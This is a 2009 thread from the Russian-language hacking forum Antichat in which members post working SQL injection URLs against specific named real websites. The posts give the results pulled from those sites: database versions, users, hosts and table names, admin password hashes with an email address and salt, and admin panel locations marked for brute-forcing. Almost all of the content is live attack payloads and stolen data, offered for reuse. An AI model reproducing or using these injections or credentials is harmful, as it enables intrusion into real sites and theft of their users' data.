ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8921  
Старый 19.04.2009, 01:08
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Информация по базе
http://manheim.ge/index.php?request=brand&lang=rus&id=36+union+selec t+1,2,3,4,version(),database(),user(),@@datadir,9, 10+--+

Список таблиц и строк
http://manheim.ge/index.php?request=brand&lang=rus&id=36+union+selec t+1,2,3,concat_ws(0x3a,table_name,column_name),5,6 ,7,8,9,10+from+information_schema.columns+--+

Привилегий на чтение файлов нет, доступа к mysql.user - нет.

Нашёл админку и PHPmyAdmin. Но и там, и там basic-авторизация. Если сбручу выложу в тему про админки.
http://manheim.ge/phpmyadmin/
http://manheim.ge/admin
 
Ответить с цитированием

  #8922  
Старый 19.04.2009, 05:25
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

xakep.ru


http://www.xakep.ru/articles/links/result.asp?tosearch=1=1)+and+77=ascii(substring(db _name(),1,1))--
 
Ответить с цитированием

  #8923  
Старый 19.04.2009, 09:47
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

sobranie.info

Цитата:
http://www.sobranie.info/searchphoto.php?Type=2\%27&Name=%D5%EB%EE%EF%EE%ED %E8%ED&Current=-4066+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCR YPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2 A2F,User()),0x71),0x71),8,9,10,11--
Database Version: 5.0.45
Database name: zs24
User name: zs24@localhost


admin:$P$BB/1iOOHVqSxlMQh/4eVAPNnnjnXuC0:dyure@sobranie.info
 
Ответить с цитированием

  #8924  
Старый 19.04.2009, 10:13
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Китайци какие-то
Код:
http://www.bareunsa.co.kr/newread.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15
barun@localhost:barun:4.1.20
 
Ответить с цитированием

  #8925  
Старый 19.04.2009, 13:55
Kraneg
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948

Репутация: 325
По умолчанию

Код:
http://www.digital-heritage.at/policies/article.php?id=111111'+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user(),database(),version()),1),1),8,9,10,11,12,13,14,15,16/*
digital@localhost:digital_heritage:5.0.19-nt
Код:
http://www.digital-heritage.at/admin/
- basic авторизация =\
 
Ответить с цитированием

Microsoft Access
  #8926  
Старый 19.04.2009, 14:06
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию Microsoft Access

-=Microsoft Access=-
<<Acca Temple>>
Код:
http://accashriners.com/news.asp?ID=-4+union+select+1,name,3,4,5,6,7+from+members
Известно
table: members
column: name
 
Ответить с цитированием

  #8927  
Старый 19.04.2009, 14:33
oRb
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940

Репутация: 2362
По умолчанию

griboedovclub.ru

PR: 5
Тиц: 275
Version: 4.0.18
User: griboedov@localhost
Database: griboedov

http://www.griboedovclub.ru/club.php?page=bill&mo=12'+union+select+1,2,3,4,5,6 ,concat_ws(0x3a,version(),user(),database()),8,9/*
 
Ответить с цитированием

MSSQL
  #8928  
Старый 19.04.2009, 15:24
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию MSSQL

<<SA Current>>
Код:
http://www.sacurrent.com/news/story.asp?id=69607+or+1=(%73%65%6C%65%63%74+top+1+table_name+from+information_schema.tables+where+table_name+not+IN+('WhatTypeID2WhatTypeID','aa_StoryWhatScrapbookDups','v_BlowoutBands','What','DPWI_BannerPageSectionPosition','aa_StoryWhoScrapbookDups','v_ClubListingDistinct','DPWI_GetAdInfoPositions','aa_StoryWorksScrapbookDups','v_ClubReviews','vStoryBody','aa_PlaceWhatScrapbookDups','v_DiningGuide','StoryTemp','aa_PlaceWhoScrapbookDups','v_EventSummarybyType1','aa_PlaceWorksScrapbookDups','v_mtRadioPlaylist','v_PDI_LocationWithArea','aa_StoryPlaceScrapbookDups','AAA_DEBUG_WhyWHListingFails','Announcements','Areas','BestOfAwards','BestOfBallotDetail','BestOfBallots','BestOfBallots2','blogPosts','Blogs','Blogs_Authors','blogUsers','Cities','ClassAd_Advertisements','ClassAd_Classifications','ClassAd_MainCategories','ClassAd_MainCategories_Classifications','ClubListing','Comments','Contacts','DP_ROLE','DP_USER','DP_UserDetails_VIEW','DPWI_AdCriteria','DPWI_ADInfo','DPWI_ADPage','DPWI_ADPageSection','DPWI_AdPosition','DPWI_AdSchedule','DPWI_PlaceDetails'))
version:
Код:
Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
database: DPSA
system_user:webuser_readonly

tableS:
DP_USER
Blogs_Authors
blogUsers
 
Ответить с цитированием

  #8929  
Старый 19.04.2009, 17:52
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://br-production.fr/newsid.php?id=16+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
version():4.0.27-max-log
database():db181593403
user():dbo181593403@212.227.127.180
 
Ответить с цитированием

  #8930  
Старый 19.04.2009, 17:53
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Вот от меня немного...
ruslom.ru
Код:
http://ruslom.ru/?page=mnews&id=-777+union+select+1,concat_ws(0x3a3a3a3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13--
ruslomit@localhost:ruslom:5.1.11-beta-log
Код:
http://ruslom.ru/?page=mnews&id=-777+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13+from+information_schema.tables+84,1--
тИЦ: 90
Pagerank: 6


izvoz.su

Код:
http://izvoz.su/izvoz_id.php?id=-1039+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
newsperson_tier@10.1.91.219:newsperson_izvoz:4.1.2 2-log

PR:0
Тиц:0

bombim.ru
Код:
http://bombim.ru/izvoz_id.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--
metallica_car@212.193.228.38:metallica_izvoz:4.1.2 2
ТИц : 0
PR:2

passat-club.ru

Код:
http://www.passat-club.ru/discounts.php?id=-80+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13,14,15--
passatclub@localhostassatclub:5.0.22
Код:
http://www.passat-club.ru/discounts.php?id=-80+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+229,1--
Код:
http://www.passat-club.ru/discounts.php?id=-80+union+select+1,2,3,4,concat_ws(0x3a,username,password,salt),6,7,8,9,10,11,12,13,14,15+from+forum.user+limit+3,1--
АДМИНИСТРАТОР:84af8d52cc5407f964dd753 46999a8d6: p1A

PR:3
ТиЦ:90
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ